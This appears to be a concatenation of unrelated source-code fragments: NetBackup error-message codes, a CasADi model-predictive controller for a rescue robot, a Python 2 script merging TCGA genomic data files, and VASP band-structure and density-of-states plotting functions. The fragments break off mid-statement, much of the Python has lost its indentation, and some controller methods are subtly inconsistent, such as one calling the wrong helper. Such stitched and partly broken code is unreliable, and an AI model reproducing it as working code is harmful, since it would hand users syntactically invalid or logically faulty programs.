350: "incorrect vault catalog backup schedule",
351: "all configured vault steps failed",
400: "Server Group Type is Invalid",
401: "Server Group Already Exists",
402: "Server Group Already Exists with a different type",
403: "Server Group Active State is not valid",
404: "Server Group does not exist",
405: "Member’s server type not compatible with Server Group",
406: "The computer specified is not a member of the server group specified",
407: "Member’s NetBackup version not compatible with Server Group",
408: "Server Group is in use",
409: "Member already exists in server group",
501: "You are not authorized to use this application.",
502: "No authorization entry exists in the auth.conf file for user name username. None of the NetBackup Java applications are available to you.",
503: "Invalid user name.",
504: "Incorrect password.",
505: "Cannot connect to the NetBackup Java authentication service on host on the configured port - (port_number). Check the log file for more details.",
506: "Cannot connect to the NetBackup Java user service on host on port port_number. If successfully logged in before, retry your last operation. Check the log file for more details.",
507: "Socket connection to the NetBackup Java user service has been broken. Retry your last operation. Check the log file for more details.",
508: "Cannot write file.",
509: "Cannot execute program.",
510: "File already existsfile_name",
511: "NetBackup Java application server interface error.",
512: "Internal error - a bad status packet was returned by NetBackup Java application server that did not contain an exit status code.",
513: "bpjava-msvcthe client is not compatible with this server version (server_version).",
514: "NetBackup Javabpjava-msvc is not compatible with this application version (application_version). You may try logon to a different NetBackup host or exit the application. The remote NetBackup host has to be configured with the same version of NetBackup as the host you started the application on.",
516: "Could not recognize or initialize the requested locale - (locale_NetBackup Java_was_started_in).",
517: "Cannot connect to the NetBackup Java user service by VNETD on host on port configured_port_number. If successfully logged on beforehand, retry your last operation. Check the log file for more details.",
518: "No ports available in range (port_number) through (port_number) per the NBJAVA_CLIENT_PORT_WINDOW configuration option.",
519: "Invalid NBJAVA_CLIENT_PORT_WINDOW configuration option value: (option_value).",
520: "Invalid value for NetBackup Java configuration option (option_name): (option_value).",
521: "NetBackup Java Configuration file (file_name) does not exist.",
522: "NetBackup Java Configuration file (file_name) is not readable due to the following error: (message).",
523: "NetBackup Java application server protocol error.",
525: "Cannot connect to the NetBackup Java authentication service by VNETD on (host) on port (vnetd_configured_port_number). Check the log file for more details.",
526: "bpjava authentication service connection failed",
527: "bpjava user service connection if connection to pbx on port 1556 fails",
537: "Connection to the NetBackup database was not successful. Ensure that the database service is running.",
538: "unable to login",
552: "The Certificate Revocation List (CRL) could not be downloaded and, therefore, the certificate revocation status could not be verified. For more information, see the NetBackup logs.",
600: "an exception condition occurred",
601: "unable to open listen socket",
602: "cannot set non-blocking mode on the listen socket",
603: "cannot register handler for accepting new connections",
604: "no target storage unit specified for the new job",
605: "received error notification for the job",
606: "no robot on which the media can be read",
607: "no images were found to synthesize",
608: "storage unit query failed",
609: "reader failed",
610: "endpoint terminated with an error",
611: "no connection to reader",
612: "cannot send extents to bpsynth",
613: "cannot connect to read media server",
614: "cannot start reader on the media server",
615: "internal error 615",
616: | |
<reponame>roni-permana-saputra/HiDO-MPC-ResQbot
"""
HiDO-MPC Class ResQbot
author: <NAME>
2021
"""
from casadi import *
import numpy as np
import time
def cal_heading_line(target_pose):
    """Return coefficients (a, b, c) of the heading line a*x + b*y + c = 0.

    The line passes through (target_pose.x, target_pose.y) with slope
    tan(target_pose.yaw); b is fixed at -1 so that a equals the slope.
    """
    slope = np.tan(target_pose.yaw)
    coeff_a = slope
    coeff_b = -1
    coeff_c = -(coeff_a * target_pose.x + coeff_b * target_pose.y)
    return coeff_a, coeff_b, coeff_c
def cal_constrain_line(target_pose):
    """Return np.array([a1, b1, c1]) for the line perpendicular to the
    heading line, passing through (target_pose.x, target_pose.y).

    The perpendicular direction is obtained by swapping the heading-line
    coefficients: (a1, b1) = (b, -a).
    """
    head_a, head_b, _head_c = cal_heading_line(target_pose)
    perp_a = head_b
    perp_b = -head_a
    perp_c = -(perp_a * target_pose.x + perp_b * target_pose.y)
    return np.array([perp_a, perp_b, perp_c])
def cal_dist2line(current_pose, target_pose):
    """Perpendicular distance from current_pose = (x, y, ...) to the heading
    line of target_pose = (x, y, yaw).

    The heading line a*x + b*y + c = 0 is rebuilt inline from target_pose;
    the distance is |a*x0 + b*y0 + c| / sqrt(a^2 + b^2).
    """
    slope = np.tan(target_pose[2])
    line_a = slope
    line_b = -1
    line_c = -(line_a * target_pose[0] + line_b * target_pose[1])
    # NOTE: fabs comes from the casadi star import at the top of the file,
    # so this also works on symbolic expressions.
    numerator = fabs(line_a * current_pose[0] + line_b * current_pose[1] + line_c)
    return numerator / np.sqrt((line_a ** 2) + (line_b ** 2))
class MPC_single_shooting_multi_objective():
def __init__(self, T, N, v_max, v_min, w_max, w_min, mpc_type):
# Parameters
# -----------------------------------
# Initialisation
# Init all parameters
# for formulation
# T : sampling time
# N : prediction horizon
# v_max : maximum linear speed
# v_min : minimum linear speed
# w_max : maximum angular speed
# w_min : minimum angular speed
# -----------------------------------
self.T = T
self.N = N
self.v_max = v_max
self.v_min = v_min
self.w_max = w_max
self.w_min = w_min
self.mpc_type = mpc_type
# Weight
self.aaa = 36.56724647970869
self.bbb = 1.1258826676004698
self.ccc = 7.377948408873998
self.ddd = 68.01501281612002
self.eee = 60.088582798687845
self.fff = 96.78399611800188
self.ggg = 10.752561956173809
self.hhh = 98.01002847504917
self.iii = 93.03643454111301
self.jjj = 95.28025019237253
self.kkk = 71.1610072822886
self.lll = 11.324284624727976
self._form_model()
self._form_obj()
self._form_const()
self._form_OPT_variables()
self.form_args()
# -------------------------
# Model Formulation
# -------------------------
    def _form_model(self):
        """Build the symbolic kinematic model and the state-prediction chain.

        Creates (as attributes):
            f  -- casadi Function (states, controls) -> state derivative.
            U  -- (n_controls x N) symbolic control sequence: the decision
                  variables of the single-shooting problem.
            P  -- symbolic parameter vector of length 2 * n_states: the
                  initial state followed by the reference state.
            X  -- (n_states x (N+1)) symbolic state trajectory, built
                  recursively from P[0:5] by explicit Euler steps of size T.
            ff -- casadi Function (U, P) -> X, used to recover the predicted
                  trajectory from an optimal control sequence.
        """
        # Robot state: pose (x, y, theta) plus current speeds (v, w).
        x = SX.sym('x')
        y = SX.sym('y')
        theta = SX.sym('theta')
        v = SX.sym('v')
        w = SX.sym('w')
        states = vertcat(x, y, theta, v, w)
        n_states = states.size(1)
        # Control inputs: linear acceleration a and angular acceleration alpha.
        a = SX.sym('a')
        alpha = SX.sym('alpha')
        controls = vertcat(a, alpha)
        n_controls = controls.size(1)
        # State transition function: unicycle kinematics with
        # acceleration-level inputs.
        rhs = vertcat(v*cos(theta), v*sin(theta), w, a, alpha) # system r.h.s
        # Nonlinear mapping function f(x, u).
        f = Function('f',[states, controls],[rhs])
        self.f = f
        # Decision variables: single shooting, so only the control sequence.
        U = SX.sym('U',n_controls,self.N) # Matrix U n_controls by N (symbolic)
        self.U = U
        # Parameter vector: initial state followed by the reference state.
        # NOTE(review): the original comment also mentioned "the previous
        # control", but P holds only n_states + n_states entries.
        P = SX.sym('P',n_states + n_states)
        self.P = P
        # State prediction matrix over the optimisation horizon.
        X = SX.sym('X',n_states,(self.N+1))
        # Fill X recursively via explicit Euler integration of f.
        X[:,0] = P[0:5] # initial state
        for k in range(self.N):
            st = X[:,k]
            con = U[:,k]
            f_value = f(st,con)
            st_next = st + (self.T*f_value)
            X[:,k+1] = st_next
        self.X = X
        # Function to compute the optimal predicted trajectory,
        # given the optimal controls obtained from the optimisation.
        ff=Function('ff',[U,P],[X])
        self.ff = ff
# -------------------------------
# Objective Function Formulation
# -------------------------------
def _form_obj(self):
# Classical MPC cost function formulation
#
# Obj = SIGMA(State_Deviation_Objectives + Control_Deviation_Objectives)
# State_Deviation_Objectives =
# mtimes(mtimes(transpose((st-self.P[3:6])),Q),(st-self.P[3:6]))
# Control_Deviation_Objectives =
# mtimes(mtimes(transpose(con),R),con)
# Q = weighing matrices (states)
# R = weighing matrices (controls)
Q = SX.zeros(3,3); Q[0,0] = 1
Q[1,1] = 5; Q[2,2] = 0.1
R = SX.zeros(2,2)
R[0,0] = 0.1; R[1,1] = 0.01
# Compute Objective
self.obj = 0
if self.mpc_type==0:
for k in range(self.N):
st = self.X[:,k]
con = self.U[:,k]
target = self.P[5:10]
dist2line = self.cal_dist2line_cost(st[0:3], target[0:3])
self.obj = self.obj+self.aaa*dist2line+self.bbb*mtimes(mtimes(transpose(st[3:5]),R),st[3:5])+self.ccc*mtimes(mtimes(transpose(con),R),con)
elif self.mpc_type==1:
for k in range(self.N):
st = self.X[:,k]
con = self.U[:,k]
target = self.P[5:10]
dist2line = self.cal_dist2line_cost(st[0:3], target[0:3])
dist_obj = ((st[0]-self.P[5])**2)+((st[1]-self.P[6])**2)
angle_diff = ((st[2]-self.P[7])**2)
self.obj = self.obj+self.ddd*dist2line+self.eee*angle_diff+self.fff*mtimes(mtimes(transpose(st[3:5]),R),st[3:5])+self.ggg*mtimes(mtimes(transpose(con),R),con)
elif self.mpc_type==2:
for k in range(self.N):
st = self.X[:,k]
con = self.U[:,k]
target = self.P[5:10]
dist2line = self.cal_dist2line_cost(st[0:3], target[0:3])
dist_obj = ((st[0]-self.P[5])**2)+((st[1]-self.P[6])**2)
angle_diff = ((st[2]-self.P[7])**2)
self.obj = self.obj+self.hhh*dist2line+self.iii*dist_obj+self.jjj*angle_diff+self.kkk*mtimes(mtimes(transpose(st[3:5]),R),st[3:5])+self.lll*mtimes(mtimes(transpose(con),R),con)
def cal_dist2line_cost(self, current_pose, target_pose):
a,b,c = self.cal_heading_line(target_pose)
dist2line = (((a*current_pose[0])+(b*current_pose[1])+c)**2)
return dist2line
# -------------------------------
# Constraints Formulation
# ------------------------------
# Stacking all constraint variable elements
    def _form_const(self):
        """Stack all constraint expressions into self.g and record the row
        index at which each constraint section ends.

        The stacking order is load-bearing: form_args assigns lower/upper
        bounds to each section by these recorded row indices.
            1. safety:          X[0, k]          for k = 0..N
            2. vehicle contour: global y of every contour point, k = 0..N
            3. linear speed:    X[3, k]          for k = 0..N
            4. angular speed:   X[4, k]          for k = 0..N
        """
        self.g = []
        # 1. Safety constraint: the robot x coordinate over the horizon
        # (bounded later in form_args).
        for k in range(self.N+1):
            self.g = vertcat(self.g, self.X[0,k])
        self.n_safety_constraints = self.g.shape[0]
        # 2. Robot geometric constraint: the y coordinate of every point of
        # the vehicle contour, for each predicted pose.
        for k in range(self.N+1):
            self._calc_global_vehicle_contour(self.X[0:3,k])
            for j in range(len(self.gvy)):
                self.g = vertcat(self.g, self.gvy[j])
        self.n_geometric_constraints = self.g.shape[0]
        # 3. Linear speed constraint (state v = X[3, k]).
        for k in range(self.N+1):
            self.g = vertcat(self.g, self.X[3,k])
        self.n_linear_speed_constraints = self.g.shape[0]
        # 4. Angular speed constraint (state w = X[4, k]).
        for k in range(self.N+1):
            self.g = vertcat(self.g, self.X[4,k])
        self.n_angular_speed_constraints = self.g.shape[0]
def _calc_global_vehicle_contour(self, st):
v_x = [-0.4, -0.3, 1.4, 1.5, 1.4, -0.3, -0.4]
v_y = [0.0, -0.3, -0.3, 0.0, 0.3, 0.3, 0.0]
self.gvx = [(ix * np.cos(st[2,0]) + iy * np.sin(st[2,0])) +
st[0,0] for (ix, iy) in zip(v_x, v_y)]
self.gvy = [(ix * np.sin(st[2,0]) - iy * np.cos(st[2,0])) +
st[1,0] for (ix, iy) in zip(v_x, v_y)]
# -----------------------------------
# Formulising Non Linear Programming
# Optimisation Problem
# -----------------------------------
def _form_OPT_variables(self):
# Formulise decision variable
OPT_variables = reshape(self.U,2*self.N,1)
# Formulise nlp problem
# Elements:
# 1. Objective function ---> f
# 2. Decision Variables ---> 'x': OPT_variables
# 3. Constraints ---> 'g': g
# 4. Parameter ---> 'p': P
nlp_prob = {'f': self.obj, 'x': OPT_variables, 'g': self.g, 'p': self.P}
# Set Hyperparameter for Optimiser
# We use 'ipopt' optimiser
# Check the hyperparameter in:
opts = {'ipopt': {'max_iter': 100, 'print_level': 0, 'print_frequency_time': 0,
'acceptable_tol': 1e-8, 'acceptable_obj_change_tol': 1e-6} }
# Formulise optimisation solver
# Solver ---> 'nlpsol'
# solver_setting ---> nlp_prob
# Optimiser ---> 'ipopt'
# optimiser_setting ---> opts
solver = nlpsol('solver', 'ipopt', nlp_prob, opts)
self.solver = solver
# -----------------------------------
# Formulising Arguments
# Constraints arguments
# -----------------------------------
def form_args(self, lbg=-20.0, ubg=20.0 ):
# Set Arguments as Dictionary on Python
# Elements:
# 1. 'lbg' ---> Lower bound from g (constraint variables)
# 2. 'ubg' ---> Upper bound from g (constraint variables)
# 3. 'lbx' ---> Lower bound from x (decision variables)
# 4. 'ubx' ---> Upper bound from x (decision variables)
args = dict()
# 1. inequality function for constraints variables
array_lbg = np.zeros(self.g.shape)
array_ubg = np.zeros(self.g.shape)
# Arguments for safety constraits
array_lbg[0:self.n_safety_constraints,:] = 0.5
array_ubg[0:self.n_safety_constraints,:] = 1.5
# Arguments for robot geometric constraints
array_lbg[self.n_safety_constraints+1:self.n_geometric_constraints,:] = -0.9
array_ubg[self.n_safety_constraints+1:self.n_geometric_constraints,:] = 0.9
# Arguments for robot linear speed constraints
array_lbg[self.n_geometric_constraints+1:self.n_linear_speed_constraints,:] = -0.5
array_ubg[self.n_geometric_constraints+1:self.n_linear_speed_constraints,:] = 0.5
# Arguments for robot angular speed constraints
array_lbg[self.n_linear_speed_constraints+1:self.g.shape[0],:] = -0.25
array_ubg[self.n_linear_speed_constraints+1:self.g.shape[0],:] = 0.25
# Combaining and input to the dictionary
args['lbg'] = array_lbg # lower bound of the states x and y
args['ubg'] = array_ubg # upper bound of the states x and y
# 2. inequality function for decission variables
lbx = np.zeros((2*self.N,1))
lbx[range(0, 2*self.N, 2),0] = -1.15 #self.v_min
lbx[range(1, 2*self.N, 2),0] = -0.5 #self.w_min
ubx = np.zeros((2*self.N,1))
ubx[range(0, 2*self.N, 2),0] = 0.5 #self.v_max
ubx[range(1, 2*self.N, 2),0] = 0.5 #self.w_max
# Combaining and input to the dictionary
args['lbx'] = lbx # lower bound of the inputs v and omega
args['ubx'] = ubx # upper bound of the inputs v and omega
self.args = args
# -----------------------------------
# Solving the NLP
# -----------------------------------
def mpc_solver(self, p, u0):
mpc_x0 = reshape(transpose(u0),2*self.N,1) # initial value of the optimization variables
sol = self.solver(x0=mpc_x0,
lbx= self.args['lbx'],
ubx=self.args['ubx'],
lbg=self.args['lbg'],
ubg=self.args['ubg'],
p=p)
return sol
def move_robot(self, x0, u, t0):
st = x0
con = transpose(u)[0,:]
f_value = self.f(st,con)
st = st + (self.T*f_value)
x0 = st
u0 = vertcat(u[1:u.shape[0],:] , u[u.shape[0]-1,:])
t0 = t0 + self.T
return x0, u0, t0
# -----------------------
# Problem for casevac
# -----------------------
def cal_heading_line(self, target_pose):
# line define by ax + by + c = 0
# tan_theta = -(a/b)
tan_theta = np.tan(target_pose[2])
b = -1
a = tan_theta
c = -((a*target_pose[0])+(b*target_pose[1]))
return a, b, c
def cal_constrain_line(self, target_pose):
a,b,c = cal_heading_line(target_pose)
a1 = b
b1 = -a
c1 = -((a1*target_pose.x) + (b1*target_pose.y))
return a1, b1, c1
def | |
should not happen, right ??? "
print aArchive
sys.exit(-1)
else:
mergeArchiveList += [aArchive]
print len(mergeArchiveList), mergeArchiveList[:3], mergeArchiveList[-3:]
print " "
# example list of file names ...
# [ 'BAIZE_p_TCGA_b138_SNP_N_GenomeWideSNP_6_A02_808774.hg19.seg.txt', 'BAIZE_p_TCGA_b138_SNP_N_GenomeWideSNP_6_A03_808754.hg19.seg.txt', ... ]
print len(mergeFileList), mergeFileList[:3], mergeFileList[-3:]
for aFile in fileList:
if (aFile in mergeFileList):
print " (d) this should not happen, right ??? "
print aFile
sys.exit(-1)
else:
mergeFileList += [aFile]
print len(mergeFileList), mergeFileList[:3], mergeFileList[-3:]
print " "
print " "
if (len(mergeSdrfDict) == 0):
print " ERROR ??? nothing returned from SDRFs ... "
sys.exit(-1)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# now we need to get set up for writing the output ...
# NEW: 21dec12 ... assuming that we will write to current working directory
outDir = "./"
outFilename = makeOutputFilename(
outDir, tumorList, platformID, outSuffix)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# in the second pass, we actually *process* all of the files ...
# initialize a bunch of things ...
sampleList = []
gotFiles = []
geneList = []
numGenes = 0
numProc = 0
iS = 0
# and then loop over tumor types ...
for zCancer in tumorList:
print ' '
print ' ********************************** '
print ' LOOP over %d CANCER TYPES ... %s ' % (len(tumorList), zCancer)
# piece together the directory name ...
## topDir = gidgetConfigVars['TCGAFMP_DCC_REPOSITORIES'] + "/dcc-snapshot/public/tumor/" + zCancer + "/cgcc/" + platformID
topDir = gidgetConfigVars['TCGAFMP_DCC_REPOSITORIES'] + "/" + \
snapshotName + "/public/tumor/" + zCancer + "/cgcc/" + platformID
# HACK: the microsat_instability data is in the "secure" branch ...
if (platformID.find("microsat_i") > 0):
topDir = gidgetConfigVars['TCGAFMP_DCC_REPOSITORIES'] + "/" + \
snapshotName + "/secure/tumor/" + \
zCancer + "/cgcc/" + platformID
numSamples = len(mergeFileList)
print " --> setting numSamples ... ", numSamples, len(mergeFileList), len(mergeSdrfDict)
print ' starting from top-level directory ', topDir
dMatch = "Level_3"
if (zPlat == "microsat_i"):
dMatch = "Level_1"
if (not os.path.exists(topDir)):
print ' --> <%s> does not exist ' % topDir
continue
d1 = path.path(topDir)
for dName in d1.dirs():
print dName
if (dName.find(dMatch) >= 0):
print ' '
print ' found a <%s> directory : <%s> ' % (dMatch, dName)
archiveName = getLastBit(dName)
print ' archiveName : ', archiveName
print ' archiveList : ', mergeArchiveList
if (len(mergeArchiveList) == 0):
print " WARNING: in make_Level3_matrix: empty archive list ??? "
continue
# we only look into archives that are in our archive list ... this
# should take care of the problem of grabbing old data ...
# (assuming that we *have* an archive list!)
if (mergeArchiveList[0] != 'unknown'):
if (archiveName not in mergeArchiveList):
continue
d2 = path.path(dName)
print ' looking for txt files in list of length %d ' % (len(d2.files()))
for fName in d2.files():
if (fName.endswith(".txt") >= 0):
fileName = getLastBit(fName)
# similarly, we only read files that are in our file
# list ...
if (fileName not in mergeFileList):
print ' SKIP: this file is not in our list (%s) ' % (fileName)
continue
if (fileName in gotFiles):
print ' SKIP: already read this file (%s) ' % (fileName)
continue
print " processing file : iS=%d %s " % (iS, fileName)
gotFiles += [fileName]
numProc += 1
# -----------------------------------------------------
# these platforms have just one sample's worth of data
# per file
if ((zPlat == "HT_HG-U133A") or (zPlat == "AgilentG4502A_07_1") or (zPlat == "AgilentG4502A_07_2")
or (zPlat == "AgilentG4502A_07_3") or (zPlat == "H-miRNA_8x15K")
or (zPlat == "IlluminaGA_RNASeq") or (zPlat == "IlluminaGA_miRNASeq")
or (zPlat == "IlluminaGA_RNASeqV2")
or (zPlat == "IlluminaHiSeq_RNASeq") or (zPlat == "IlluminaHiSeq_RNASeqV2")
or (zPlat == "IlluminaHiSeq_miRNASeq")
or (zPlat == "HumanMethylation27") or (zPlat == "Genome_Wide_SNP_6")
or (zPlat == "HumanMethylation450") or (zPlat == "MDA_RPPA_Core")
or (zPlat == "microsat_i")):
(barcode, info) = getSampleID(
mergeSdrfDict, fileName)
print barcode, info
sampleList += [barcode]
(geneList, dataVec) = readOneDataFile(fName,
geneList, zPlat, metaData)
# print geneList[:10]
# print dataVec[:10]
if (numGenes == 0):
# for Genome_Wide_SNP_6 segmentations, we don't have a fixed
# number of genes but rather a variable number
# of segmentations ...
if (zPlat == "Genome_Wide_SNP_6"):
# looking at the current set of ~3500 TCGA level-3 segmentations,
# the # of segments per sample is quite highly variable ...
# 50th %ile ~ 700
# 90th %ile ~ 1100
# 97th %ile ~ 3000
# but a few samples far exceed 30,000 ... we will set an upper
# limit at 25000 and then just deal with the samples that exceed that ...
# (though perhaps these are the files that have "do not use" in
# the SDRF file???)
numGenes = 25000
# trying to handle LAML ??? 22feb13
numGenes = 60000
else:
numGenes = len(geneList)
print " --> allocating dataMatrix ... %d x %d " % (numGenes, numSamples)
dataMatrix = [0] * numGenes
for iG in range(numGenes):
dataMatrix[iG] = [0] * numSamples
if (zPlat == "Genome_Wide_SNP_6"):
print " --> allocating segMatrix ... %d x %d " % (numGenes, numSamples)
segMatrix = [0] * numGenes
for iG in range(numGenes):
segMatrix[iG] = [''] * numSamples
if (len(dataVec) > numGenes):
if (zPlat == "Genome_Wide_SNP_6"):
(geneList, dataVec) = mergeSegments(
geneList, dataVec)
else:
print " ERROR ??? should not be here ... now what ? "
sys.exit(-1)
print " getting data from <%s> for barcode <%s> and iS=%3d " % (fName, barcode, iS)
# and write out what we are using to the log file
# ...
if (not logFlag):
# open a log file to which we will write the
# specs for all of the files used ...
fhLog = openDataFreezeLogFile(
zCancer, outSuffix, platformStrings)
logFlag = 1
writeDataFreezeLog(fhLog, fName, barcode)
# for iG in range(numGenes):
for iG in range(len(dataVec)):
try:
dataMatrix[iG][iS] = dataVec[iG]
except:
print " PROBLEM ??? iG=%d iS=%d " % (iG, iS)
sys.exit(-1)
# if this is the GWS6 snp chip, we need to copy the
# segment positions too ...
if (zPlat == "Genome_Wide_SNP_6"):
for iG in range(len(dataVec)):
segMatrix[iG][iS] = geneList[iG]
iS += 1
# -----------------------------------------------------
# we should never get here ...
else:
print " ERROR !!! ??? how did this happen ? unknown platform ? ", zPlat
sys.exit(-1)
print " --> got %d files processed " % numProc
print ' '
print " what do we have here ??? "
print len(sampleList)
print len(gotFiles)
print len(geneList)
print numGenes, numProc, iS
# print ' '
print ' have data matrix of size %d genes x %d samples \n' % (numGenes, numSamples)
print ' '
# print sampleList[:10]
if ((numGenes * numSamples) < 10):
print " ERROR ??? we have essentially no data ??? "
sys.exit(-1)
if (numSamples != len(sampleList)):
print " ERROR ??? how can the number of samples not match the length of the sample list ??? "
print numSamples, len(sampleList)
sys.exit(-1)
# if we get this far, we should make sure that the output directory we
# want exists
print " --> testing that we have an output directory ... <%s> " % outDir
tsvIO.createDir(outDir)
print " output file name will be called <%s> " % outFilename
# finally we write out the data (if it is CN data, first we need to resegment it)
# at this stage, we set a very high level for dropping rows or columns due to missing
# data ... 80% is the value I'm trying out now (3pm Fri 11Feb)
if (zPlat == "Genome_Wide_SNP_6"):
if (1):
# this is better for producing variable-length, hopefully
# uncorrelated, features
steplength = 1000
cutFrac = 0.01
cutFrac = 0.02 # 26may12 : trying | |
calculations. (G is automatically converted to \\Gamma)
n (int): Number of points between each high symmetry points.
This is also only required for HSE calculations. This number should be
known by the user, as it was used to generate the KPOINTS file.
fontsize (float): Font size of the text in the figure.
save (bool): Determines whether to automatically save the figure or not. If not
the figure and axis are return for further manipulation.
fill (bool): Determines whether or not to fill underneath the plot
alpha (float): Alpha value for the fill
sigma (float): Standard deviation for gaussian filter
Returns:
If save == True, this function will return nothing and directly save the image as
the output name. If save == False, the function will return the matplotlib figure
and axis for further editing.
"""
fig, ax = plt.subplots(
nrows=1,
ncols=2,
sharey=True,
figsize=figsize,
dpi=400,
gridspec_kw={'width_ratios': width_ratios}
)
ax1, ax2 = _figure_setup_band_dos(
ax=ax,
fontsize=fontsize,
ylim=[erange[0], erange[1]]
)
band = Band(
folder=band_folder,
spin=spin,
projected=True,
hse=hse,
kpath=kpath,
n=n,
)
dos = Dos(folder=dos_folder, spin=spin)
band.plot_elements(
ax=ax1,
elements=elements,
scale_factor=scale_factor,
color_list=color_list,
legend=legend,
linewidth=linewidth,
band_color=band_color,
)
dos.plot_elements(
ax=ax2,
elements=elements,
fill=fill,
alpha=alpha,
linewidth=linewidth,
sigma=sigma,
energyaxis='y',
color_list=color_list,
legend=legend,
total=True,
erange=erange,
)
fig.canvas.draw()
nbins = len(ax2.get_xticklabels())
ax2.xaxis.set_major_locator(MaxNLocator(nbins=nbins - 1, prune='lower'))
plt.tight_layout(pad=0.2)
plt.subplots_adjust(wspace=0)
if save:
plt.savefig(output)
else:
return fig, ax1, ax2
def band_dos_element_spd(
    band_folder,
    dos_folder,
    elements,
    output='band_dos_element_spd.png',
    spin='up',
    scale_factor=6,
    order=['s', 'p', 'd'],
    color_dict=None,
    legend=True,
    linewidth=0.75,
    band_color='black',
    figsize=(6, 3),
    width_ratios=[7, 3],
    erange=[-6, 6],
    hse=False,
    kpath=None,
    n=None,
    fontsize=7,
    save=True,
    fill=True,
    alpha=0.3,
    sigma=0.05,
):
    """
    Plot an s/p/d-projected band structure for the chosen elements next to a
    density of states projected onto the same orbitals of the same elements.

    Parameters:
        band_folder (str): Folder with the VASP output for the band structure.
        dos_folder (str): Folder with the VASP output for the density of states.
        elements (list): Element symbols to project onto.
        output (str): File name of the saved figure.
        spin (str): Spin channel to parse ('up' or 'down').
        scale_factor (float): Scaling applied to the projection weights
            (controls scatter-point size on the band panel).
        order (list): Plotting order of the s/p/d points; later entries are
            drawn on top, so put the smaller-weight orbitals last to keep
            them visible.
        color_dict (dict[str][str]): Optional orbital colors in the form
            {'s': <color>, 'p': <color>, 'd': <color>}.
        legend (bool): Whether to draw a legend (on the DOS panel).
        linewidth (float): Line width of the plain background band structure.
        band_color (string): Color of the plain background band structure.
        figsize (list / tuple): Figure size in inches (width, height).
        width_ratios (list / tuple): Relative widths of band and DOS panels.
        erange (list / tuple): Energy window to display, [low, high].
        hse (bool): Whether the calculation is HSE (changes KPOINTS handling).
        kpath (str): High-symmetry k-point path; required for HSE runs only,
            since the path cannot be read from an HSE KPOINTS file.
            (G is automatically converted to \\Gamma)
        n (int): Points between consecutive high-symmetry points; required
            for HSE runs only and must match the value used to build KPOINTS.
        fontsize (float): Font size of figure text.
        save (bool): If True the figure is written to `output`; otherwise the
            figure and both axes are returned for further editing.
        fill (bool): Whether to fill underneath the DOS curves.
        alpha (float): Alpha value for the fill.
        sigma (float): Standard deviation of the DOS gaussian smoothing.
    Returns:
        None when save is True; otherwise (figure, band axis, dos axis).
    """
    fig, axes = plt.subplots(
        nrows=1,
        ncols=2,
        sharey=True,
        figsize=figsize,
        dpi=400,
        gridspec_kw={'width_ratios': width_ratios},
    )
    band_ax, dos_ax = _figure_setup_band_dos(
        ax=axes,
        fontsize=fontsize,
        ylim=[erange[0], erange[1]],
    )

    band_data = Band(
        folder=band_folder,
        spin=spin,
        projected=True,
        hse=hse,
        kpath=kpath,
        n=n,
    )
    dos_data = Dos(folder=dos_folder, spin=spin)

    band_data.plot_element_spd(
        ax=band_ax,
        elements=elements,
        scale_factor=scale_factor,
        order=order,
        color_dict=color_dict,
        legend=False,  # legend is drawn on the DOS panel only
        linewidth=linewidth,
        band_color=band_color,
    )
    dos_data.plot_element_spd(
        ax=dos_ax,
        elements=elements,
        order=order,
        fill=fill,
        alpha=alpha,
        linewidth=linewidth,
        sigma=sigma,
        energyaxis='y',
        color_dict=color_dict,
        legend=legend,
        total=True,
        erange=erange,
    )

    # drop the lowest DOS tick so it does not collide with the band panel
    fig.canvas.draw()
    tick_count = len(dos_ax.get_xticklabels())
    dos_ax.xaxis.set_major_locator(MaxNLocator(nbins=tick_count - 1, prune='lower'))
    plt.tight_layout(pad=0.2)
    plt.subplots_adjust(wspace=0)

    if save:
        plt.savefig(output)
    else:
        return fig, band_ax, dos_ax
def band_dos_element_orbitals(
    band_folder,
    dos_folder,
    element_orbital_pairs,
    output='band_dos_element_orbitals.png',
    spin='up',
    scale_factor=6,
    color_list=None,
    legend=True,
    linewidth=0.75,
    band_color='black',
    figsize=(6, 3),
    width_ratios=[7, 3],
    erange=[-6, 6],
    hse=False,
    kpath=None,
    n=None,
    fontsize=7,
    save=True,
    fill=True,
    alpha=0.3,
    sigma=0.05,
):
    """
    Plot a band structure projected onto selected (element, orbital) pairs
    next to a density of states projected onto the same pairs.

    Parameters:
        band_folder (str): Folder with the VASP output for the band structure.
        dos_folder (str): Folder with the VASP output for the density of states.
        element_orbital_pairs (list[list]): Pairs of the form
            [[element symbol, orbital index], [element symbol, orbital index], ...]
        output (str): File name of the saved figure.
        spin (str): Spin channel to parse ('up' or 'down').
        scale_factor (float): Scaling applied to the projection weights
            (controls scatter-point size on the band panel).
        color_list (list): One color per entry of element_orbital_pairs.
        legend (bool): Whether to draw a legend (on the DOS panel).
        linewidth (float): Line width of the plain background band structure.
        band_color (string): Color of the plain background band structure.
        figsize (list / tuple): Figure size in inches (width, height).
        width_ratios (list / tuple): Relative widths of band and DOS panels.
        erange (list / tuple): Energy window to display, [low, high].
        hse (bool): Whether the calculation is HSE (changes KPOINTS handling).
        kpath (str): High-symmetry k-point path; required for HSE runs only,
            since the path cannot be read from an HSE KPOINTS file.
            (G is automatically converted to \\Gamma)
        n (int): Points between consecutive high-symmetry points; required
            for HSE runs only and must match the value used to build KPOINTS.
        fontsize (float): Font size of figure text.
        save (bool): If True the figure is written to `output`; otherwise the
            figure and both axes are returned for further editing.
        fill (bool): Whether to fill underneath the DOS curves.
        alpha (float): Alpha value for the fill.
        sigma (float): Standard deviation of the DOS gaussian smoothing.
    Returns:
        None when save is True; otherwise (figure, band axis, dos axis).
    """
    fig, axes = plt.subplots(
        nrows=1,
        ncols=2,
        sharey=True,
        figsize=figsize,
        dpi=400,
        gridspec_kw={'width_ratios': width_ratios},
    )
    band_ax, dos_ax = _figure_setup_band_dos(
        ax=axes,
        fontsize=fontsize,
        ylim=[erange[0], erange[1]],
    )

    band_data = Band(
        folder=band_folder,
        spin=spin,
        projected=True,
        hse=hse,
        kpath=kpath,
        n=n,
    )
    dos_data = Dos(folder=dos_folder, spin=spin)

    band_data.plot_element_orbitals(
        ax=band_ax,
        scale_factor=scale_factor,
        element_orbital_pairs=element_orbital_pairs,
        color_list=color_list,
        legend=False,  # legend is drawn on the DOS panel only
        linewidth=linewidth,
        band_color=band_color,
    )
    dos_data.plot_element_orbitals(
        ax=dos_ax,
        element_orbital_pairs=element_orbital_pairs,
        fill=fill,
        alpha=alpha,
        linewidth=linewidth,
        sigma=sigma,
        energyaxis='y',
        color_list=color_list,
